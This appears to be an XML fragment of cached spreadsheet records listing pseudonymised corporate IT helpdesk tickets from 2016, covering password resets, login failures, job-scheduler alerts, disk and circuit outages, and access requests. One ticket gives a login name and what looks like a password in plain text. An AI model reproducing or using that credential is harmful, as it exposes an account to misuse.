    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1305 at 08/08/16 22:43:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to login to skype "/>
    <s v="unable to login to skype "/>
    <s v="uplmtybe pdmwyoil"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to upgrade the outlook"/>
    <s v="name:dehnfyru_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:uvjpaeli.bnphqsxr@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:need to upgrade the outlook 2013"/>
    <s v="uvjpaeli bnphqsxr"/>
    <x v="27"/>
  </r>
  <r>
    <s v="company\orshop_floor_app locked out for too many tries of wrong password"/>
    <s v="multiple computers use the same log in. company\orshop_floor_app locked out"/>
    <s v="xdswhrif ludsxncq"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" Job_2049e:was running longer than 30 minutes,kirtyled and rerun"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2049e at 08/08/16 22:00:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="delete sto 5018072616 &amp; 5018966647 "/>
    <s v="from: johthryugftyson hu _x000d__x000a_sent: tuesday, august 09, 2016 6:16 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: qgrbnjiu hidzlfma_x000d__x000a_subject: fw: delete sto 5018072616 &amp; 5018966647 _x000d__x000a__x000d__x000a_it help,_x000d__x000a__x000d__x000a_we need delete both sto 5018072616 &amp; 5018966647 , but get same error message as screen below._x000d__x000a__x000d__x000a_now we block them to avoid unnessary dn to be created._x000d__x000a__x000d__x000a_please help check how we can delete them,  "/>
    <s v="ovhtgsxd dcqhnrmy"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ticket update for pmqansex nvihmbwc"/>
    <s v="from: rakthyesh ramdntythanjesh _x000a_sent: tuesday, august 09, 2016 6:02 am_x000a_to: ugyothfz ugrmkdhx_x000a_cc: pmqansex nvihmbwc_x000a_subject: ticket_no1520236-create email account for employee gzwasqoc gadisyxr_x000a__x000a_good morning safrgyynjit,_x000a__x000a_user called to service desk and requested to expedite the issue, kindly take this request on priority and assist user._x000a__x000a_kind "/>
    <s v="eqzibjhw ymebpoih"/>
    <x v="0"/>
  </r>
  <r>
    <s v="inquiry on etime login"/>
    <s v="inquiry on etime login"/>
    <s v="nkademwy ihsepkwz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="shop floor pc locked : coshopfloor3"/>
    <s v="shop floor pc locked : coshopfloor3"/>
    <s v="mljbrewk oejwkbrt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="symantec endpoint encryption page-unable to login"/>
    <s v="symantec endpoint encryption page-unable to login"/>
    <s v="vgtpkjhn flwsytik"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1320"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1320 at 08/08/16 19:46:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkwin_HostName_768_inc"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkwin_HostName_768_inc at 08/08/16 19:29:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="multiple processes are showing down on HostName_1288-hana-SID_59 since 7:05 pm on 08/08 et"/>
    <s v="multiple processes are showing down on HostName_1288-hana-SID_59 since 7:05 pm on 08/08 et_x000d__x000a_process hdbnameserver is not running_x000d__x000a_process hdbxsengine is not running_x000d__x000a_process hdbpreprocessor is not running_x000d__x000a_process hdbcompileserve is not running_x000d__x000a_process hdbindexserver is not running_x000d__x000a_process hdb.erpSID_59_hdb0 is not running_x000d__x000a_"/>
    <s v="jloygrwh acvztedi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="zdis discounts do not appear"/>
    <s v="zdis discounts are not applying and should be.  zdis isn't even showing as a condition and should be.  this is causing incorrect sales orders and orders to be placed on hold.  _x000d__x000a_please see the following sales orders.  _x000d__x000a_35892987.  _x000d__x000a_35891192 items 20 and 50-80.  _x000d__x000a_quote 3116213902 items 20 &amp; 40."/>
    <s v="rmegscqu juksmtho"/>
    <x v="12"/>
  </r>
  <r>
    <s v="us25- dedicated hr_tool clock in for hourly employees"/>
    <s v="_x000a__x000a_received from: wvngzrca.sfmrzdth@gmail.com_x000a__x000a_please add the appropriate options for  the following hourly employees who have dedicated computers to clock &quot;in&quot; and &quot;out&quot; with hr_tool at their desks and laptops:_x000a__x000a_us25 -zjihgovn cqxahony 33288_x000a_us25 -dpuifqeo eglwsfkn 27125_x000a_us25 -ihlsmzdn cnhqgzwt 27230_x000a_us25-ewgihcnz vdjqoeip 62605_x000a_us25 -moxnqszg zgdckste 63856_x000a_us25 -bghrbie crhyley 27164_x000a__x000a__x000a__x000a__x000a_if i may be of further assistance please feel free to contact me at any time._x000a__x000a__x000a_wvngzrca sfmrzdth, phr_x000a_human resources manager_x000a_us_plant/usa, nc_x000a_wvngzrca.sfmrzdth@gmail.com&lt;mailto:wvngzrca.sfmrzdth@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a_"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access needed to vmsliazh ltksxmyv in us_plant."/>
    <s v="_x000a__x000a_received from: umzcxfah.aoshpjiu@gmail.com_x000a__x000a_user debtgyrur  had access to the us_plant vmsliazh ltksxmyv  HostName_1262  to do downloads fzwxitmen jwvuasft daily.  today that access seems to be broken.  please restore aerp.  i am usaing whatever approvals are required to restore this connection immediately.  it is causing a shutdown to the production process and needs to be immediately addressed._x000a__x000a_"/>
    <s v="umzcxfah aoshpjiu"/>
    <x v="1"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="gyweclbt oahmgpfy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user wanted to check if there are discounts on microsoft products."/>
    <s v="user wanted to check if there are discounts on microsoft products."/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool e time issue"/>
    <s v="hr_tool e time issue_x000a__x000a__x000a_name:wvngzrca sfmrzdth_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wvngzrca.sfmrzdth@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:do i request e-time computer access from it? for team members who are assigned a computer?"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="Job_1953d was running longer than 30 minutes kirtyled and rerun "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1953d at 08/08/16 16:20:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="contract management employee publication_p2016-07-24-16-00-04"/>
    <s v="contract management employee publication_p2016-07-24-16-00-04"/>
    <s v="jgxclrzp jzeantui"/>
    <x v="8"/>
  </r>
  <r>
    <s v="collaboration_platform is asking me to login at each page. "/>
    <s v="please assist with keeping my account logged in."/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1178 : the status on HostName_1178.company.com.status is not as expected (3 (red))"/>
    <s v="HostName_1178 : the status on HostName_1178.company.com.status is not as expected (3 (red))"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="xp pc in lab hooked to microscope gets a bsod on login."/>
    <s v="xp pc in lab hooked to microscope gets a bsod on login."/>
    <s v="qfgtalec mwpqfbxk"/>
    <x v="2"/>
  </r>
  <r>
    <s v=" the terminate action for johthryu chmielewski has completed."/>
    <s v="from: rlgmiuwt dfpqxbgm [mailto:system@hr_tool.com] _x000a_sent: monday, august 08, 2016 8:04 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar - the terminate action for johthryu chmielewski has completed._x000a__x000a_hello , _x000a__x000a_a termination for johthryu chmielewski, 1156177031, effective 08/05/2016  has been approved._x000a__x000a_click the link to view._x000a__x000a_"/>
    <s v="rlgmiuwt dfpqxbgm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to map a printer"/>
    <s v="unable to map a printer"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset password for cnljsmat.ocxjvdnz@gmail.com"/>
    <s v="reset password for cnljsmat.ocxjvdnz@gmail.com"/>
    <s v="bvwepigr ekmarvgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp-powder interface not working"/>
    <s v="erp-powder interface not working.  "/>
    <s v="yxwniljk doveqpsy"/>
    <x v="44"/>
  </r>
  <r>
    <s v="change erp printer"/>
    <s v="please change my erp printer (hrp- hcm production) to usa fm0006._x000d__x000a_"/>
    <s v="fgsmwvcp uoxkzwes"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to see crm add-in in outlook"/>
    <s v="unable to see crm add-in in outlook"/>
    <s v="bsujizqk zmlfkengineering_tool"/>
    <x v="0"/>
  </r>
  <r>
    <s v="having trouble with my password accessing the portal."/>
    <s v="name:upajtkbn wzyspovl_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:upajtkbn.wzyspovl@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:having trouble with my password accessing the portal."/>
    <s v="wrqxmfan fsizndjb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to outlook."/>
    <s v="microsoft outlook - all morning it shows either trying to connect or gives me an error about not being able to connect to the server. i have emails from this morning still sitting in my outbox that i cannot get to send. and no new emails coming in. i have rebooted outlook twice and my whole system once with no success."/>
    <s v="qnvjhgmc nicvbrzg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook calendar"/>
    <s v="_x000d__x000a__x000d__x000a_received from: opzuciql.muedfkhz@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_my outlook calendar shows &quot;no information&quot; when someone tries to schedule a meeting with me using the scheduling assistant. how can i fix that?_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="opzuciql muedfkhz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to save attachments from business_client"/>
    <s v="unable to save attachments from business_client"/>
    <s v="kgqpwvzu rkexzwlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="uqjbkydr bsqofdlx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to one time"/>
    <s v="_x000a_name:wvngzrca sfmrzdth_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wvngzrca.sfmrzdth@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i have had and still have issues with sf loading. it is just a white page. can you advise?_x000a_"/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vmax disk failed on df-8b-c"/>
    <s v="the monitor is the disk failed? on df-8b-c-0/000192604484/localhost is outside expected limits (true = true)"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="rounding concerns for mexico.  please assign ticket to rabhtuikurtyar  tammineni"/>
    <s v="znet should not be applied to zcnc, zcnp or manual condition for 1108."/>
    <s v="rmegscqu juksmtho"/>
    <x v="12"/>
  </r>
  <r>
    <s v="account locked out : trust relationship issue "/>
    <s v="account locked out : trust relationship issue "/>
    <s v="tbjcygrn megaypdn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool system"/>
    <s v="not able to enter customer details in engineering_tool system"/>
    <s v="obanjrhg rnafleys"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to hear any audio from skype"/>
    <s v="unable to hear any audio from skype"/>
    <s v="gsotqxfi lidunfjg"/>
    <x v="26"/>
  </r>
  <r>
    <s v="mii is not responding:orders can not be scanned out, system is locking up, or giving error (see below) "/>
    <s v="there was a technical error. &lt;br&gt; please try again. &lt;br&gt; if the problem persists please notify an administrator &lt;br&gt; error:the following error occured while processing the request :[object object] status: error error: internal server error_x000d__x000a__x000d__x000a_operator have rebooted computer multiple times.  karghyuen "/>
    <s v="swapdqkx cvkbwjxe"/>
    <x v="40"/>
  </r>
  <r>
    <s v="password reset and login issues in collaboration_platform."/>
    <s v="password reset and login issues in collaboration_platform."/>
    <s v="gsyjxfur nuwoikzj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="employee's password for etime is not working"/>
    <s v="please issue new password for etime access for employee gyweclbt oahmgpfy, ee#636130 aerp."/>
    <s v="urgianpb rwbpsvmh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="release of device"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qpixeudn.rjlziysd@gmail.com_x000d__x000a__x000d__x000a_please release this device from quarantine_x000d__x000a__x000d__x000a_from: microsoft outlook_x000d__x000a_sent: monday, august 8, 2016 11:20 am_x000d__x000a_to: qpixeudn rjlziysd &lt;qpixeudn.rjlziysd@gmail.com&gt;_x000d__x000a_subject: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000d__x000a__x000d__x000a__x000d__x000a_your mobile device is temporarily blocked from accessing content via exchange activesync because the mobile device has been quarantined. you don't need to take any action. content will automatically be downloaded as soon as access is usaed by your administrator._x000d__x000a__x000d__x000a_please ignore the above paragraph. we cannot change it or delete it._x000d__x000a__x000d__x000a_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_x000d__x000a__x000d__x000a_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_x000d__x000a__x000d__x000a_currently approved handheld devices can be found in this policy:_x000d__x000a__x000d__x000a_wireless mobility technical document &lt;_x000d__x000a__x000d__x000a_the above policy will be updated as other devices are approved for use._x000d__x000a__x000d__x000a_if you own an approved device and would like to take advantage of this opportstorage_product you can submit a ticketing_tool ticket &lt;&quot;https:/company.ticketing_tool.com/incident.do?sysparm_stack=incident_list.do&amp;sys_id=-1&amp;sysparm_query=incident.do?sys_id=-1&amp;sysparm_template=mobile&g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_x000d__x000a__x000d__x000a_any ticket without the signed form will be cancelled. you have 2 weeks to process and submit the form before your device will be denied (deleted from quarantine)._x000d__x000a__x000d__x000a_wireless mobility standard procedure &lt;_x000d__x000a__x000d__x000a_information about your mobile device:_x000d__x000a_device model:_x000d__x000a__x000d__x000a_iphone8c1_x000d__x000a__x000d__x000a_device type:_x000d__x000a__x000d__x000a_iphone_x000d__x000a__x000d__x000a_device id:_x000d__x000a__x000d__x000a_r6ufpmv1sd4uSID_7839t39l7gfkk_x000d__x000a__x000d__x000a_device os:_x000d__x000a__x000d__x000a_ios 9.3.3 13g34_x000d__x000a__x000d__x000a_device user agent:_x000d__x000a__x000d__x000a_apple-iphone8c1/1307.34_x000d__x000a__x000d__x000a_device imei:_x000d__x000a__x000d__x000a_exchange activesync version:_x000d__x000a__x000d__x000a_16.0_x000d__x000a__x000d__x000a_device access state:_x000d__x000a__x000d__x000a_quarantined_x000d__x000a__x000d__x000a_device access state reason:_x000d__x000a__x000d__x000a_global_x000d__x000a__x000d__x000a__x000d__x000a_sent at 8/8/2016 3:20:18 pm to qpixeudn.rjlziysd@gmail.com&lt;mailto:qpixeudn.rjlziysd@gmail.com&gt;._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="qpixeudn rjlziysd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to outlook and skype"/>
    <s v="unable to login to outlook and skype"/>
    <s v="klsrmzvq otsdnmzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000d__x000a__x000d__x000a_enter user id of user having the issue: mitctdrhb_x000d__x000a__x000d__x000a_transaction code(s) the user needs or was working with:logon_x000d__x000a__x000d__x000a_describe the issue: changed password using password manager, unable to log into erp_x000d__x000a__x000d__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000d__x000a__x000d__x000a_provide access the same as this other user:"/>
    <s v="msrxjfdz ncsaryod"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ess password reset request"/>
    <s v="misplaced password, ad password reset needed"/>
    <s v="gsyjxfur nuwoikzj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the user ricagthyr doflefne id:noggtyuerp"/>
    <s v="hello team,_x000d__x000a__x000d__x000a_could you please unlock account  email  in cell phone the user ptgwfymc.mchpwvgf@gmail.com id:noggtyuerp_x000d__x000a__x000d__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype im not logging in"/>
    <s v="stuck at logging in._x000d__x000a_personal certificate error"/>
    <s v="ncuwyeib plnzhxvc"/>
    <x v="27"/>
  </r>
  <r>
    <s v="issue while connecting though telecom_vendor_3 gprs sim"/>
    <s v="_x000d__x000a__x000d__x000a_received from: cgqjxtkf.soewtuvf@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am facing an issue while connecting telecom_vendor_3 gprs network._x000d__x000a_pl look into the same._x000d__x000a__x000d__x000a_"/>
    <s v="cgqjxtkf soewtuvf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for  on erp / production / hcm"/>
    <s v="locked out of erp SID_34 not set up in password_management_tool getting an error unable to find account for user ginemkl when logging into password_management_tool. _x000d__x000a__x000d__x000a_please notify wptbgchj jutpdcqf once account is unlocked_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_ "/>
    <s v="wptbgchj jutpdcqf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for kevguind l gineman using password_management_tool password reset."/>
    <s v="the"/>
    <s v="nckihpba czrdksex"/>
    <x v="16"/>
  </r>
  <r>
    <s v="goods receipt issue"/>
    <s v="hello, on po5616641196 the po was created for 10 rolls of paper with a price of Â£19.36 each. this price has not been changed in the purchase order but the goods receipt has been booked in for a total amount of Â£367.84. i have asked about this with the uk warehouse and they are not sure it's possible to goods receipt at a different value. can you see what has caused this? "/>
    <s v="fonjtyhr wnclfztv"/>
    <x v="29"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2021b"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2021b at 08/08/16 10:10:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job qeue from the engg application stopped"/>
    <s v="the job qeue processor of the engg stopped and needs to be restarted. please forward to the engg group."/>
    <s v="dmqxwkfr olmwqzpu"/>
    <x v="57"/>
  </r>
  <r>
    <s v="windows account locked out"/>
    <s v="windows account locked out"/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my docking station is not charging my computer"/>
    <s v=" i've checked all the plugs and it's still not charging my computer."/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with lean tracker"/>
    <s v="issues with lean tracker"/>
    <s v="vnsmwqhb ogtpenjd"/>
    <x v="27"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="gsyjxfur nuwoikzj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook after changing the password"/>
    <s v="unable to launch outlook after changing the password"/>
    <s v="sbvlxuwm yanbikrx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock csvlijud jzhnkclo "/>
    <s v="unlock csvlijud jzhnkclo _x000a_pc name : rrsp04479_x000a_contact name : _x000a_user id ; _x000a_.\administrator  _x000a_"/>
    <s v="jrigdbox bgyluoqn"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to login to windows // account locked"/>
    <s v="unable to login to windows // account locked"/>
    <s v="uerghtyi erzatqpy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log into hr_tool"/>
    <s v="i get directed to a hr_tool logon page instead of directly getting authenticated with sso._x000d__x000a_see attachments _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="esntuago kwxrdhuv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot make a skype meeting, every time it errors out stating that skype is not running."/>
    <s v="i cannot make a skype meeting, every time it errors out stating that skype is not running."/>
    <s v="qvtlcbyg lbnjhysc"/>
    <x v="2"/>
  </r>
  <r>
    <s v="shagfferon called to reset password for user :bregtnnl"/>
    <s v="shagfferon called to reset password for user :bregtnnl"/>
    <s v="xpvluoni xeqjzofu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for robhyertyj l shipping_tool on erp / production / bw"/>
    <s v="i have not used this in quite awhile and it will not let me in with my current password."/>
    <s v="sdvlxbfe ptnahjkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="browser issue : collaboration_platform not loading "/>
    <s v="browser issue : collaboration_platform not loading "/>
    <s v="zxvjsipd jbzmgyvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="ulmctsvi lbvrdika"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: vogelfontein, south africa mpls circuit is down at 8:14 am et on 08/08"/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __________8:14 am et on 08/08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___yes_    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____yes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jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="access to vpn : user id : wijuiidl"/>
    <s v="computer name ; lehl8516849_x000d__x000a_access to vpn "/>
    <s v="imcknxos ucyfkaxg"/>
    <x v="33"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="awpcmsey ctdiuqwe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex patch installation "/>
    <s v="bex patch installation "/>
    <s v="nqlertog bshidqox"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software login issue "/>
    <s v="supply_chain_software login issue "/>
    <s v="yiramjqc qtrcepsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ingreso a business_client"/>
    <s v="no puedo ingresar a business_client con mi contraseÃ±a."/>
    <s v="igfbkzne duyinzmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need replacement monitor for coatncqulao qauighdpchine."/>
    <s v="need replacement monitor for coatncqulao qauighdpchine."/>
    <s v="utvpkdgi oznqyvmp"/>
    <x v="2"/>
  </r>
  <r>
    <s v="item numbers issue with the inwarehouse_tool forms for israel"/>
    <s v="item numbers issue with the inwarehouse_tool forms for israel."/>
    <s v="aofnvyzt eqiyskhm"/>
    <x v="20"/>
  </r>
  <r>
    <s v="bqdlegnp lnphmsco's password has expired.  please call him at "/>
    <s v="please call bqdlegnp lnphmsco at to update his password.  he cannot login to anything."/>
    <s v="bqdlegnp lnphmsco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="general enquiry"/>
    <s v="general enquiry"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="time recording is not working"/>
    <s v="_x000a__x000a_EU_tool - unable to connect to server. time recording in EU_tool does not work. EU_tool is installed on the user's pc._x000a__x000a_telefon:"/>
    <s v="ahlqgjwx wbsfavhg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="my home location is usa.  whenever i come to us_plant, and connect to the network, my pc runs estorage_productly slow.  all programdntys are slow._x000d__x000a__x000d__x000a_how did you determine there are network problems ?_x000d__x000a__x000d__x000a_is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow)_x000d__x000a__x000d__x000a_are more than one transactions impacted?_x000d__x000a__x000d__x000a_what erp server are you on (server name is located in the status bar at the bottom _x000d__x000a_right of your screen) ?_x000d__x000a__x000d__x000a_do other co-workers also notice slow response times in erp ?_x000d__x000a__x000d__x000a_what other applications are running slow ? _x000d__x000a__x000d__x000a_can you access your data files on the server ?_x000d__x000a__x000d__x000a_any other comments or issues with other systems ?"/>
    <s v="clgfntoe rhtmnzsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="oneteam sso not working"/>
    <s v="i'm unable to log in to hr_tool/oneteam through the sso portal on the hub. whenever i click on the oneteam link in the portal i'm taken to a login screen instead of being logged directly into the system. i have tried clearing my browser cache and i've tried logging in using both ie and firefox. "/>
    <s v="kcnosyae zlpmfxgs"/>
    <x v="73"/>
  </r>
  <r>
    <s v="company center does not show org 1101 after i changed my password"/>
    <s v="i just changed my password and now my company center account does not show the option to choose 1101 in the sales org.  login info:  bfrgtonersp  au45gdec22"/>
    <s v="jizkuxpg hfamjysw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_184- average (1 samples) disk free on /nfsbackup is now 2%, which is below the error threshold (5%)  "/>
    <s v="HostName_184- disk free on /nfsbackup is now 2%, which is below the error threshold (5%) out of total size 7000.0 gb"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="install pdf-mailer \kebogxzp difnjlkp"/>
    <s v="install pdf-mailer \kebogxzp difnjlkp"/>
    <s v="kebogxzp difnjlkp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reset the password for couskjgd uzojtkmh on windows login"/>
    <s v="hi,_x000a_please unlock sebfghkasthian's account. (couskjgd uzojtkmh - wirftejas - couskjgd.uzojtkmh@gmail.com)_x000a_"/>
    <s v="couskjgd uzojtkmh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for couskjgd uzojtkmh using password_management_tool password reset."/>
    <s v="hi, _x000d__x000a_please unlock sebfghkasthian's (wiejas couskjgd.uzojtkmh@gmail.com) account._x000d__x000a_"/>
    <s v="couskjgd uzojtkmh"/>
    <x v="16"/>
  </r>
  <r>
    <s v="probleme mit rechner ewew8323531 \defekte fp sektoren \xosdfhbu gtbfkisl"/>
    <s v="probleme mit rechner ewew8323531 \defekte fp sektoren \xosdfhbu gtbfkisl"/>
    <s v="xosdfhbu gtbfkisl"/>
    <x v="24"/>
  </r>
  <r>
    <s v="requester: oqxdecus encxjoawjr:  can you put usa-shop sw06 port23 on the vlan50? i'm trying to get a machine on the netwo"/>
    <s v="_x000d__x000a__x000d__x000a_received from: sthyuraj.sektyhar@company.com_x000d__x000a__x000d__x000a_hi suraj. can you put usa-shop sw06 port23 on the vlan50? i'm trying to get a machine on the network._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="sxhqfaoe evobwgiy"/>
    <x v="3"/>
  </r>
  <r>
    <s v="unable to open collaboration_platform"/>
    <s v="name:betshdy _x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:zxvjsipd.jbzmgyvd@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cannot get collaboration_platform to open. it just sits and spins."/>
    <s v="zxvjsipd jbzmgyvd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 - incorrect language in automated email message"/>
    <s v="i received 2 emails (attached) for taking over a collaboration_platform for an employee who is no longer working at company._x000d__x000a_1 message was in german, the other is portuguese (i think)."/>
    <s v="esntuago kwxrdhuv"/>
    <x v="15"/>
  </r>
  <r>
    <s v="email delegation issues with nqtjsbad.jfxeoudc@gmail.com mailbox"/>
    <s v="email delegation issues with nqtjsbad.jfxeoudc@gmail.com mailbox"/>
    <s v="kcnosyae zlpmfxgs"/>
    <x v="26"/>
  </r>
  <r>
    <s v="urgent  : need access to all roanoke drives for new machine user for mii implementation today"/>
    <s v="_x000a_received from: umzcxfah.aoshpjiu@gmail.com_x000a__x000a_all machines in roanoke have been changed to user login &quot;roaghyunokepc&quot; full access._x000a__x000a_please add this user to all lrrsm03\departments  aerp.  production is down._x000a__x000a_umzcxfah aoshpjiu_x000a_plant controller, us_plant_x000a_umzcxfah.aoshpjiu@gmail.com_x000a__x000a_"/>
    <s v="umzcxfah aoshpjiu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp output screen issue."/>
    <s v="_x000d__x000a__x000d__x000a_received from: esaqztby.mhnbqiyc@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_kindly look into below snap, erp output screen enable to show details in proper arrangement , is there any issue in erp network._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1f19b.92b3d920]_x000d__x000a__x000d__x000a_best "/>
    <s v="esaqztby mhnbqiyc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rds server germany not reachable for thinclients (HostName_584)"/>
    <s v="after reboot of the serverteam my thinclients are not able to connect to the rds server (HostName_584)"/>
    <s v="smpijawb eawkpgqf"/>
    <x v="11"/>
  </r>
  <r>
    <s v="single/sign on for hr_tool oneteam is not working "/>
    <s v="_x000d__x000a__x000d__x000a_received from: jegpvyrh.kasnhdrb@gmail.com_x000d__x000a__x000d__x000a_single/sign on for hr_tool oneteam is not working_x000d__x000a_please see screen below._x000d__x000a__x000d__x000a_[cid:image001.png@01d1f181.a1f8SID_310]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="jegpvyrh kasnhdrb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 zdsxmcwu thdjzolwronization issue  "/>
    <s v="erp SID_34 zdsxmcwu thdjzolwronization issue "/>
